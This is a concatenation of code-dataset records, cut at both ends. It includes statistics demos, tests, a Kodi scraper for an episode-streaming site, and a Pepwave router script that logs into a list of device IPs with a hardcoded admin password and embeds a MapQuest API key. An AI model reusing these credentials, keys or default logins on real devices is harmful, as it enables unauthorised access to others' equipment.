float(len(scores))))\n","sub_path":"business/p201908/700/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"526103178","text":"import scipy\nfrom scipy import integrate\nimport random\nimport pylab\n\n\ndef gaus(x, mu, sigma):\n part1 = 1 / (sigma * (2 * scipy.pi) ** 0.5)\n ePower = (-(x - mu) ** 2) / (2 * (sigma) ** 2)\n part2 = scipy.e ** ePower\n return part1 * part2\n\n\ndef 
normal_distribution(mean=0, sigma=1, nPoints=1000000, bins=1000):\n    \"\"\"plots a bell curve with n points\"\"\"\n    points = [random.gauss(mean, sigma) for _ in range(nPoints)]\n    pylab.figure()\n    pylab.hist(points, bins=bins)\n\n\ndef empirical_rule(fnc, mu, sigma):\n    \"\"\"integrates provided function over 1, 2, and 3 SD intervals\"\"\"\n    fncArgs = (mu, sigma)\n    results = []\n    for iSigma in range(1, 4, 1):\n        delta = iSigma * sigma\n        a, b = mu - delta, mu + delta\n        results.append(scipy.integrate.quad(fnc, a, b, fncArgs))\n    print(*results, sep=\"\\n\")\n    print(\"Expected: 68-95-99.7\")\n\n\nif __name__ == \"__main__\":\n    empirical_rule(gaus, 0, 10)\n    pylab.show()\n","sub_path":"src/prob_and_distros/normal_distribution.py","file_name":"normal_distribution.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"188735016","text":"from ip_suite import IPSuite as IPSuite\nimport sys\n\nclass Solution:\n    def main(self):\n        given = \"\"\n        while not given:\n            given = str(input(\"Please enter a valid IPV4 address in the form of IP/mask: (enter q to quit) \"))\n            if given == \"q\":\n                sys.exit(0)\n            else:\n                if IPSuite.validateInput(given):\n                    ip, mask = given.split(\"/\")\n                    ipClass = IPSuite.getIPClass(ip)\n                    ipDesignation = IPSuite.getIPDesignation(ip)\n                    if ipClass and ipDesignation:\n                        print(\"IP: {} \\nSubnet Mask: {} \\nClass: {} \\nDesignation: {} \\n\".format(ip, mask, ipClass, ipDesignation))\n                    else:\n                        print(\"Something went wrong! \\n\")\n                        sys.exit(0)\n                else:\n                    given = \"\"\n\nif __name__ == '__main__':\n    Solution().main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40683370","text":"# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collector.test.base import BaseTest\n\nfrom collector.api.common.util import build_index\nfrom collector.api.common.util import get_index\nfrom collector.api.common.util import split_collection\nfrom six.moves import xrange\n\n\nclass Indexed(object):\n \"\"\"Helper object for testing indexing of objects\n \"\"\"\n def __init__(self, **kwds):\n self.__dict__.update(kwds)\n\n\nclass TestUtil(BaseTest):\n\n def test_split_collection(self):\n coll = list(xrange(3))\n chunks = list(split_collection(coll, chunk_size=len(coll)))\n self.assertEqual(1, len(chunks))\n self.assertListEqual(chunks[0], coll)\n\n chunks = list(split_collection(coll, chunk_size=len(coll) + 1))\n self.assertEqual(1, len(chunks))\n self.assertListEqual(chunks[0], coll)\n\n chunks = list(split_collection(coll, chunk_size=len(coll) - 1))\n self.assertEqual(2, len(chunks))\n self.assertListEqual(chunks[0], coll[:-1])\n self.assertListEqual(chunks[1], coll[-1:])\n\n def test_build_index(self):\n coll = [\n {'id': 1, 'cd': 2, 'msg': 'm'},\n {'id': 1, 'cd': 2, 'msg': 'm'},\n Indexed(**{'id': 1, 'cd': 3, 'msg': 'm'}),\n Indexed(**{'id': 2, 'cd': 4, 'msg': 'm'})\n ]\n\n index = build_index(coll, 'id')\n self.assertEqual(2, len(index))\n self.assertEqual(coll[2], index[(1,)])\n self.assertEqual(coll[3], index[(2,)])\n\n index = build_index(coll, 'id', 'cd')\n self.assertEqual(3, len(index))\n self.assertDictEqual(coll[1], index[(1, 2)])\n self.assertEqual(coll[2], index[(1, 3)])\n self.assertEqual(coll[3], index[(2, 4)])\n\n def test_get_index(self):\n checks = [\n (Indexed(**{'one': 1, 'two': 2}), ('one', ), (1,)),\n (Indexed(**{'one': 1, 'two': 2}), ('one', 'two'), (1, 2)),\n (Indexed(**{'one': 1, 'two': 2}), (), ()),\n ]\n for obj, fields, idx in checks:\n self.assertTupleEqual(\n idx,\n get_index(obj, *fields)\n )\n","sub_path":"collector/collector/test/common/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"258466755","text":"# -*- coding: utf-8 -*-\n\n'''\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n'''\n\nimport re, urllib, urlparse, json\n\nfrom resources.lib.modules import cleantitle\nfrom resources.lib.modules import client, source_utils\n\n\nclass source:\n    def __init__(self):\n        self.priority = 1\n        self.language = ['en']\n        self.domains = ['watchepisodes.com', 'watchepisodes.unblocked.pl']\n        self.base_link = 'http://www.watchepisodes4.com/'\n        self.search_link = 'search/ajax_search?q=%s'\n\n    def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):\n        try:\n            url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}\n            url = urllib.urlencode(url)\n            return url\n        except BaseException:\n            return\n\n    def episode(self, url, imdb, tvdb, title, premiered, season, episode):\n        try:\n            if url is None:\n                return\n\n            url = urlparse.parse_qs(url)\n            url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])\n            url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode\n            url = urllib.urlencode(url)\n            return url\n        except BaseException:\n            return\n\n    def sources(self, url, hostDict, hostprDict):\n        sources = []\n        try:\n            if url is None:\n                return sources\n\n            data = urlparse.parse_qs(url)\n            data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])\n            title = data['tvshowtitle']\n            hdlr = 's%02de%02d' % (int(data['season']), int(data['episode']))\n\n            query = urllib.quote_plus(cleantitle.getsearch(title))\n            surl = urlparse.urljoin(self.base_link, self.search_link % query)\n            r = client.request(surl, XHR=True)\n            r = json.loads(r)\n            r = r['series']\n            for i in r:\n                tit = i['value']\n                if not cleantitle.get(title) == cleantitle.get(tit): raise Exception()\n                slink = i['seo']\n                slink = urlparse.urljoin(self.base_link, slink)\n\n                r = client.request(slink)\n                if not data['imdb'] in r: raise Exception()\n                data = client.parseDOM(r, 'div', {'class': 'el-item\\s*'})\n                epis = [client.parseDOM(i, 'a', ret='href')[0] for i in data if i]\n                epis = [i for i in epis if hdlr in i.lower()][0]\n                r = client.request(epis)\n                links = client.parseDOM(r, 'a', ret='data-actuallink')\n                for url in links:\n                    try:\n                        valid, host = source_utils.is_host_valid(url, hostDict)\n                        if not valid: raise Exception()\n                        sources.append({'source': host, 'quality': 'SD', 'language': 'en', 'url': url, 'direct': False, 'debridonly': False})\n                    except BaseException:\n                        return sources\n\n            return sources\n        except BaseException:\n            return sources\n\n    def resolve(self, url):\n        return url\n","sub_path":"HAX/18.CocoJoe/script.module.lambdascrapers/lib/lambdascrapers/sources_overeasy/en/watchepisodes.py","file_name":"watchepisodes.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596668427","text":"import sys\nfrom boto.s3.connection import S3Connection\nimport argparse \nimport json\nBUCKETNAME = \"aisoftwareresearch\"\n\ndef main():\n    #define arguments\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-a','--access_key_id', required=True, help='aws_access_key_id')\n    parser.add_argument('-s','--secret_access_key', required=True, help='aws_secret_access_key')\n    #parser.add_argument('-f','--s3_folder_name', required=True, help='folder name in S3')\n    #binding the variables \n    args = parser.parse_args()\n    \n    extraction = \"productprice\"\n    qual_name = \"productprice\"\n    #print args\n    conn = S3Connection(args.access_key_id, args.secret_access_key)\n    \n    b = conn.get_bucket(BUCKETNAME)\n    #key = b.get_key(\"extractions/%s/qualification/config/qual_%s.json\" % (extraction, 
qual_name))\n #b.get_key(\"\" + s3_folder_name + \"Qualification/config/qual_eyehair.json\")\n key = b.get_key(\"extractions/eyehair/qualification/config/qual_eyehair.json\")\n\n #key = (\"qual_eyehair.json\")\n data = key.get_contents_as_string()\n #sprint data\n JSONdata = json.loads(data)\n createHTML(b, JSONdata)\n\ndef createHTML(b, JSONdata):\n sentence = JSONdata[\"sentence\"]\n columnIndex = {}\n columns = []\n for category in JSONdata[\"categories\"]:\n columnIndex[category[\"label\"]] = int(category[\"position\"])-1\n columns.append(category[\"label\"])\n content = \"\"\n\n for l in range(0, len(sentence)):\n annotations = JSONdata[\"sentence\"][l][\"annotations\"]\n explanation = JSONdata[\"sentence\"][l][\"explanation\"][\"wrong\"][\"text\"]\n contents = \"\"\n\n if(annotations == \"no\"):\n contents += \"\"\"

Incorrect.
The correct answer is:

Explanation: \"\"\"+explanation+\"\"\"

\"\"\"\n else:\n SELECTED=\"checked='checked'\"\n UNSELECTED=\"disabled\"\n visibility = [UNSELECTED] * len(columnIndex)\n auxCategories = \"\"\n\n for i in range(0, len(JSONdata[\"categories\"])):\n auxCategories += JSONdata[\"categories\"][i][\"label\"]+ \",\"\n categories = auxCategories.split(\",\")\n categories = categories[:-1]\n options = \"\" \n answers = []\n counter = 12\n for (category, tabvalues) in JSONdata[\"sentence\"][l][\"answer\"].iteritems():\n\n for answer in tabvalues.split('\\t'):\n if (answer != \"\"):\n options += \"\"\"
\"\"\"+answer+\"\"\"
\"\"\"\n if (counter == 1):\n counter = 12\n counter -= 1\n visibility = [UNSELECTED] * len(columnIndex)\n visibility[columnIndex[category]] = SELECTED\n for v,c in zip(visibility, columns):\n options += \"\"\"\"\"\"\n options += \"\"\"
\"\"\"\n contents += \"\"\"

Incorrect.
The correct answer is:

\"\"\"+ options +\"\"\"

Explanation: \"\"\"+explanation+\"\"\"

\"\"\"\n JSONdata[\"sentence\"][l][\"explanation\"][\"wrong\"][\"code\"] = contents\n\n #uploadToS3(b, HTMLContent)\n with open('output_qual_eyehair.json', 'w') as f:\n json.dump(JSONdata, f, sort_keys = True, indent= 4)\n\ndef uploadToS3( b, HTMLContent):\n k = b.new_key(\"Qualification/config/output_qual_eyehair.html\")\n k.content_type = 'text/html'\n k.set_contents_from_string(HTMLContent)\n\n# call main() if this is run as standalone\nif __name__ == \"__main__\":\n sys.exit(main())","sub_path":"z-attic/qualification/z-attic/explanationGenerator_final.py","file_name":"explanationGenerator_final.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641807022","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@File:test01_ip排序.py \n@E-mail:364942727@qq.com\n@Time:2019-12-17 15:07 \n@Author:Nobita \n@Version:1.0 \n@Desciption:test01_ip排序题\n\"\"\"\n\nimport re\n\n#题目:要求返回一个ip数组,并且按照ip最后一位排序返回\nstring = \"192.0.0.1?!289.0.0.1!0.0.0.0!192.163.10.28?192.0.0.1\"\n'''\n思路分析:\n1.首先去除特殊符号后返回一个列表str_list\n2.判断列表里的每个元素是否符合ip的格式,不符合去除\n3.得到满足ip格式的新列表new_list,按照ip最后一位排序返回result\n'''\n\nif __name__ == '__main__':\n str_list = re.split('\\?!|!|\\?', string)\n '''通过正则去除特殊符号,返回str_list'''\n new_list = []\n for ip in str_list:\n ip_list = ip.split('.')\n if len(ip_list) == 4:\n for i in ip_list:\n if eval(i) > 255 or eval(i) < 0:\n break\n else:\n new_list.append(ip)\n '''\n 思路分析:\n 1.遍历列表str_list,判断ip是否为X.X.X.X格式。\n 2.满足ip格式,再判断里面的数值是否在0-255之间。\n 3.均满足则追加这个ip到新的列表new_list中。\n '''\n\n result = sorted(new_list, key=lambda x: x[-1])\n '''对列表net_list按照ip最后一位数字进行排序'''\n print(result)\n","sub_path":"test01_ip排序.py","file_name":"test01_ip排序.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104170614","text":"import os\nimport json\nimport requests\nimport sys\nimport time\nimport urllib3, urllib\nfrom requests.auth import HTTPDigestAuth\n\ndef login(url):\n endpoint = url + '/login'\n payload = {\"username\":\"admin\", \"password\":\"admin12345\"}\n header = {\"content-type\":\"application/json\"}\n session = requests.Session()\n response = session.post(endpoint, data=json.dumps(payload), headers=header, verify=False)\n cookies = response.cookies.get_dict()\n sessionid = cookies[\"bauth\"]\n return sessionid\n\ndef logout(url, sessionid):\n endpoint = url + '/logout'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.post(endpoint, headers=header, verify=False)\n\ndef get_wan(url, sessionid):\n endpoint = url + '/status.wan.connection'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return(response_json)\n\ndef get_gps(url, sessionid):\n endpoint = url + '/info.location'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return response_json['location']\n\ndef get_client(url, sessionid):\n endpoint = url + '/status.client'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n client_list = []\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n for i in response_json.values():\n 
client_list += i\n for i in client_list:\n if i['active']:\n print(i['ip'] + ' ' + i['connectionType'] + ' active: true')\n return(client_list)\n\ndef get_bandwidth(url, sessionid):\n endpoint = url + '/status.wan.connection.allowance'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return(response_json)\n\ndef post_sms(url, sessionid):\n endpoint = url + '/cmd.sms.sendMessage'\n payload = {\"address\":\"+12533349251\", \"content\":\"Alert Tripwires\"}\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.post(endpoint, data=json.dumps(payload), headers=header, verify=False)\n response_json = response.json()\n return(response_json)\n\ndef get_sms(url, sessionid):\n endpoint = url + '/cmd.sms.get?connId=2'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.post(endpoint, headers=header, verify=False)\n response_json = response.json()\n return(response_json)\n\ndef get_ssid(url, sessionid):\n endpoint = url + '/config.ssid.profile'\n header = {\"content-type\":\"application/json\", \"cookie\":\"bauth=\" + sessionid}\n response = requests.get(endpoint, headers=header, verify=False)\n response_json = response.json()['response']\n return(response_json)\n\ndef get_cam_type(ip):\n payload = {'action': 'getConfig', 'name': 'ChannelTitle'}\n user = 'admin'\n password = 'admin12345'\n param = urllib.parse.urlencode(payload, quote_via=urllib.parse.quote)\n cam_url = 'http://%s/cgi-bin/configManager.cgi?' % ip\n cam_resp = requests.get(cam_url, params=param, auth=HTTPDigestAuth(user, password), stream=False)\n cam_json = json.dumps(cam_resp.text)\n cam_list = cam_json.split('\\\\r\\\\n', 4)\n cam_list.remove('\"')\n sorted_cam = []\n for i in cam_list:\n sorted_cam.append(i.split('=', 1)[1])\n return sorted_cam\n #for i in cam_list:\n # print(i)\n #cam_list.append(cam_resp.text.rstrip())\n #for i in cam_list:\n # print('This is line' + i)\n #print(json.dumps(cam_resp.text))\n\ndef get_geocode(lat, lon):\n key = '9C8OSEmL77jB3BJNkatauCGTA9O8u9BR'\n #Original url with metadata and intersection which we don't need it.\n #url = 'http://www.mapquestapi.com/geocoding/v1/reverse?key=%s&location=%s,%s&includeRoadMetadata=true&includeNearestIntersection=true' % (key, lat, lon)\n url = 'http://www.mapquestapi.com/geocoding/v1/reverse?key=%s&location=%s,%s' % (key, lat, lon)\n print(url)\n response = requests.get(url)\n response_json = response.json()\n return(response_json['results'][0]['locations'][0])\n\ndef write_dict_to_json(datasets, file_name):\n #Convert datasets dict to list json\n cur_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n rows_tojson = []\n for k,v in datasets.items():\n row_tojson = {\n 'id': k,\n 'ip': v['ip'],\n 'lat': v['lat'],\n 'lon': v['lon'],\n 'address': v['address'],\n 'cam1': v['cam1'], \n 'cam2': v['cam2'], \n 'cam3': v['cam3'], \n 'cam4': v['cam4'], \n 'systime': cur_time\n }\n rows_tojson.append(row_tojson)\n with open(file_name, 'w') as gpsjsonfile:\n json.dump(rows_tojson, gpsjsonfile, indent=4)\n\ndef main():\n urllib3.disable_warnings()\n context = {}\n #ip_file = open('tesla_ips_2.txt')\n ip_file = open(sys.argv[1])\n file_name = sys.argv[2]\n ip_lines = ip_file.readlines()\n for line in ip_lines:\n ip = line.rstrip()\n cam_type = get_cam_type(ip)\n url = 'https://%s:8443/api' % ip\n sessionid = 
login(url)\n print(ip)\n responsejson = (get_gps(url, sessionid))\n #print(responsejson)\n #print('lat: ' + str(responsejson['latitude']) + 'lon: ' + str(responsejson['longitude']))\n lat = str(responsejson['latitude'])\n lon = str(responsejson['longitude'])\n responsejson = get_geocode(responsejson['latitude'], responsejson['longitude'])\n #print(responsejson)\n address = responsejson['street'] + ', ' + responsejson['adminArea5'] + ' ' + responsejson['adminArea3'] + ' ' + responsejson['postalCode']\n responsejson = get_ssid(url, sessionid)\n #print(responsejson)\n ssid = responsejson['1']['name']\n context.update({ssid[-4:]: {'ip': ip, 'lat': lat, 'lon': lon, 'address': address, 'cam1': cam_type[0], 'cam2': cam_type[1], 'cam3': cam_type[2], 'cam4': cam_type[3]}})\n logout(url, sessionid)\n write_dict_to_json(context, file_name)\n\nif __name__ == '__main__':\n main()\n","sub_path":"py_pepwave_inject.py","file_name":"py_pepwave_inject.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"392659256","text":"import numpy as np\nimport matplotlib.pyplot as plt\nj=np.complex(0,1)\na=input(\"enter length of input\")\na1=input(\"enter length of input\")\nN=a+a1-1\nprint(N)\nx2=[]\nx1=[]\nfor b in range(0,a):\n\tc=input(\"enter value\")\n\tx1.append(c)\nprint(x1)\nfor b1 in range(0,a1):\n\tc1=input(\"enter value\")\n\tx2.append(c1)\nprint(x2)\ny=np.zeros(a+a1-1)\nfor i in range(0,N):\n\tfor k in range(0,a):\n\t\tif((i-k)>=0 and (i-k)<=2):\n\t\t\ty[i]=y[i]+(x1[k]*x2[i-k])\nplt.subplot(311)\nplt.stem(x1)\nplt.subplot(312)\nplt.stem(x2)\nplt.subplot(313)\nplt.stem(y)\nplt.show()\nprint(y)\n","sub_path":"con2.py","file_name":"con2.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"574840850","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule takes data extraction from GLUE and combines into one long spreadsheet\n\"\"\"\n\n#==============================================================================\n# Imports and id correct data path\n#==============================================================================\nimport sys\nsys.path.append('C:/Users/rheil/dev/glue-sb/')\nimport pandas as pd\nimport numpy as np\nimport dirfuncs\nimport gc\nimport geopandas as gpd\nimport pysal as ps\ndropbox_dir = dirfuncs.guess_dropbox_dir()\n\ndata_dir = dropbox_dir + 'soyM/glue_data_package/3-18_Amazon_Cerrado/'\nout_dir = dropbox_dir + 'soyM/analysis/3-18/'\n\n#==============================================================================\n# Define functions for testing\n#==============================================================================\ndef isPositive(series, tolerance = 0):\n \"\"\"\n Checks whether all values in a series are positive\n \"\"\"\n series = series.dropna()\n if (series >= 0 - tolerance).all():\n pass\n else:\n raise ValueError(\"Not all entries are positive: \" + series.name)\n \ndef isShare(series, tolerance = 0):\n \"\"\"\n Checks whether all values in a series are between 0 and 1\n \"\"\"\n series = series.dropna()\n if (series >= 0 - tolerance).all():\n pass\n else:\n raise ValueError(\"Not all entries are positive: \" + series.name)\n if (series <= 1 + tolerance).all():\n pass\n else:\n raise ValueError(\"Not all entries are less than 1: \" + series.name) \n\ndef isSame(seriesA, seriesB, tolerance = 0):\n \"\"\"\n Checks whether all values in two series are the same (given\n a tolerance for 
minor errors)\n    \"\"\"\n    dif = np.abs(seriesA - seriesB) \n    dif = dif.dropna()\n    if (dif > tolerance).any():\n        raise ValueError(\"Series aren't the same: \" + seriesA.name + ', ' + seriesB.name)\n    else:\n        pass\n    \n##==============================================================================\n## create attribute csv\n##==============================================================================\n#orig_data_csvs = [data_dir + 'dataset_part1.csv',\n#                  data_dir + 'dataset_part2.csv',\n#                  data_dir + 'dataset_part3.csv']\n#n_csv = len(orig_data_csvs)\n#data_list = [pd.read_csv(orig_data_csvs[i]) for i in range(n_csv)]\n#\n#data_df = pd.merge(data_list[0], data_list[1], left_on = 'projectid', \n#                   right_on = 'projectid', how = 'left')\n#for i in range(2,n_csv):\n#    data_df = pd.merge(data_df, data_list[i], left_on = 'projectid', \n#                       right_on = 'projectid', how = 'left')\n#\n#keep_cols = ['projectid', 'munic_code', 'state', 'Amdist', 'roadskm', \n#             'urbankm', 'indig', 'prot_us', 'prot_pi', 'suitarea', \n#             'verysuit', 'step2duplicatetoremove', 'step3incra', \n#             'step4dremovesmaller25pct', 'amareaha', 'cerha', 'PRODES_non_coverage_area'] # Add potential covariates\n#stubs = ['soycotton', 'soydouble', 'soysingle']\n#for stub in stubs:\n#    keep_cols.extend([col for col in data_df.columns if stub in col])\n#data_df = data_df[keep_cols] \n#data_df.to_csv(data_dir + 'orig_data.csv')\n \n#==============================================================================\n# Define input datasets\n#==============================================================================\ndata_csv = data_dir + 'property_variables.csv'\npt_csv = data_dir + 'pt_extract.csv'\n\n#==============================================================================\n# Load data\n#==============================================================================\nheader = pd.read_csv(data_csv, engine = 'python', nrows = 1)\n\nkeep_cols = ['propertyid', 'municcode', 'amdist', 'state', 'cerdist', 'roaddist', \n             'urbandist', 'indig', 'protus', 'protpi', 'suit', 'verysuit', \n             'amprodesha', 'amnonprodesha', 'cerha', 'propareahafinal',\n             'for00amprodes', 'nonforveg00amprodes', 'for00amnonprodes', 'nonforveg00amnonprodes',\n             'for00cer', 'nonforveg00cer', 'amsoy01', 'amsoy07', 'amsoy15', \n             'cersoy01', 'cersoy07', 'cersoy14'] # Add potential covariates\n\nstubs = ['foramprodes', 'foramnonprodes', 'vegamprodes', \n         'vegamnonprodes', 'forcer', 'vegcer']\nfor stub in stubs:\n    keep_cols.extend([col for col in header.columns if ((col.startswith('de20') | col.startswith('soyam15de20') | col.startswith('soycer14de20')) & (stub in col))])\n\nstubs = ['veg', 'for']\nfor stub in stubs:\n    keep_cols.extend([col for col in header.columns if ((col.startswith('soycer14de20')) & (stub in col))])\n\nstubs = ['soycotton', 'soydouble', 'soysingle', 'cersoy', 'amsoy']\nfor stub in stubs:\n    keep_cols.extend([col for col in header.columns if (col.startswith(stub)) & (stub in col)])\n\n\n#data_df = pd.read_csv(data_csv, nrows = 10000, engine = 'python', na_values = 'na',\n#                      usecols = keep_cols)\ndata_df = pd.read_csv(data_csv, engine = 'python', na_values = 'na',\n                      usecols = keep_cols)\n\n#data_dict = {key: pd.read_csv(data_csv) for key, data_csv in data_csvs.items()}\n#data_dict['as_2007'] = data_dict['as_2007'][['projectid', 'am07', 'cer07']]\n#data_dict['as_2001'] = data_dict['as_2001'][['projectid', 'am01', 'cer01']]\n#data_dict['weather'] = data_dict['weather'].rename(columns = {col: \\\n#    col.replace('precip', 'precip_20') for col in data_dict['weather'].columns if 
'precip' in col})\n#data_dict['weather'] = data_dict['weather'].rename(columns = {col: \\\n# col.replace('celcius', 'temp_20') for col in data_dict['weather'].columns if 'celcius' in col})\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n##data_df = pd.merge(data_dict['orig'], data_dict['cer_dist'], left_on = 'projectid', \n## right_on = 'projectid', how = 'left')\n#data_df = data_dict['orig']\n#del data_dict['orig']\n#for key, df in data_dict.items():\n# data_df = pd.merge(data_df, df, left_on = 'projectid', \n# right_on = 'projectid', how = 'left')\n# \n#del data_dict\n\n##==============================================================================\n## Simple tests on data\n##==============================================================================\n#years = [str(i).zfill(2) for i in range(1, 16)]\n#for y in years:\n# isSame(data_df['de' + y], (data_df['deamprodes' + y] + \\\n# data_df['deamnonprodes' + y] + data_df['decer' + y]), 0)\n# \n##suffixes = ['', 'amprodes', 'amnonprodes', 'cer']\n##for suffix in suffixes:\n## test_series = data_df['de' + suffix + '01'] - \\\n## (data_df['for00' + suffix] + data_df['nonforveg00' + suffix])\n## isPositive(test_series)\n\n#==============================================================================\n# Drop small properties (justified by soy property calculations below)\n#==============================================================================\ndata_df = data_df.loc[(data_df['propareahafinal']>50)]\n\n#==============================================================================\n# Add points extraction data (lat, lon, temp, precip, distance)\n#==============================================================================\npt_df = pd.read_csv(pt_csv)\ndata_df = pd.merge(data_df, pt_df, left_on = 'propertyid', \n right_on = 'propertyid', how = 'left')\n#data_df = data_df.set_index('propertyid')\ndel pt_df\n\n#==============================================================================\n# Drop unnecessary columns\n#==============================================================================\n#drop_cols = ['Unnamed: 0', \n# 'amp_f2s_a_2000', 'amnp_f2s_a_2000', 'ce_f2s_a_2000', 'tot_f_d_20pre01', \n# 'amp_f_d_20pre01', 'amnp_f_d_20pre01', 'ce_f_d_20pre01', \n# 'other00', 'water00', 'nonforveg00',\n# 'PRODES_coverage_area', 'PRODES_coverage_share', 'PRODES_non_coverage_area',\n# 'for00cer', 'nonforveg00cer', 'for00amnonprodes', 'nonforveg00amnonprodes',\n# 'for00amprodes', 'nonforveg00amprodes', 'for00', 'nonforveg00']\n#drop_cols.extend([col for col in data_df.columns if 'am15'==col[:len('am15')]])\n#data_df = data_df.drop(drop_cols, axis = 1)\n\n#drop_list = ['soycer14de2000': 'pre2000_ce_f2s'] \n#drop_list = [col for col in data_df.columns if 'de2000am' in col]\n#drop_list.append()\n#drop_list = [col for col in data_df.columns if 'soycer01' in col]\n#drop_list = [col for col in data_df.columns if 'soycer07' in col]\n#drop_list = [col for col in data_df.columns if 'soyam01' in col]\n#drop_list = [col for col in data_df.columns if 'soyam07' in col]\n#data_df = data_df.drop(drop_list, axis = 1)\n\n#==============================================================================\n# Rename 
variables\n#==============================================================================\ndata_df = data_df.rename(columns = {'propertyid': 'propid'})\n\nrename_dict = {'forcer': 'ce_tf_',\n 'foramprodes': 'amp_tf_',\n 'foramnonprodes': 'amnp_tf_',\n 'vegcer': 'ce_v_',\n 'vegamprodes': 'amp_v_',\n 'vegamnonprodes': 'amnp_v_',\n 'for': 'ce_tf_',\n 'veg': 'ce_v_'}\ndata_df = data_df.rename(columns = {col: rename_dict[col[6:]] + 'd_' + col[2:6] \\\n for col in data_df.columns if col[:4]=='de20'})\ndata_df = data_df.rename(columns = {col: rename_dict[col[13:]] + 'f2s_20' + col[11:13] \\\n for col in data_df.columns if col[7:11]=='de20'})\ndata_df = data_df.rename(columns = {col: rename_dict[col[14:]] + 'f2s_20' + col[12:14] \\\n for col in data_df.columns if col[8:12]=='de20'})\n\n#rename_dict = {'deamprodes': 'amp_f_d_20',\n# 'deamnonprodes': 'amnp_f_d_20',\n# 'decer': 'ce_f_d_20',\n# 'de': 'tot_f_d_20',\n# 'am15_prodes': 'amp_f2s_a_20',\n# 'am15_nonprodes': 'amnp_f2s_a_20',\n# 'cer14_': 'ce_f2s_a_20'}\n#\n#for orig, new in rename_dict.items():\n# data_df = data_df.rename(columns = {col: col.replace(orig, new) for col \\\n# in data_df.columns if orig == col[:len(orig)]})\n\ndata_df = data_df.rename(columns = {'for00amprodes': 'amp_tf_a_2016',\n 'for00amnonprodes': 'amnp_tf_a_2016',\n 'for00cer': 'ce_tf_a_2016',\n 'nonforveg00amprodes': 'amp_v_a_2016',\n 'nonforveg00amnonprodes': 'amnp_v_a_2016',\n 'nonforveg00cer': 'ce_v_a_2016'})\n\ndata_df = data_df.rename(columns = {'amsoy01': 'am_s_a_2001',\n 'amsoy07': 'am_s_a_2007', \n 'amsoy15': 'am_s_a_2015', \n 'cersoy01': 'ce_s_a_2001',\n 'cersoy07': 'ce_s_a_2007', \n 'cersoy14': 'ce_s_a_2014'})\n\nfor col in data_df.columns:\n print(col)\n\n#==============================================================================\n# Create aggregated deforestation variables\n#==============================================================================\nfor year in range(2001, 2017):\n year = str(year)\n data_df['amp_f_d_' + year] = data_df['amp_tf_d_' + year] + data_df['amp_v_d_' + year]\n data_df['amnp_f_d_' + year] = data_df['amnp_tf_d_' + year] + data_df['amnp_v_d_' + year]\n data_df['ce_f_d_' + year] = 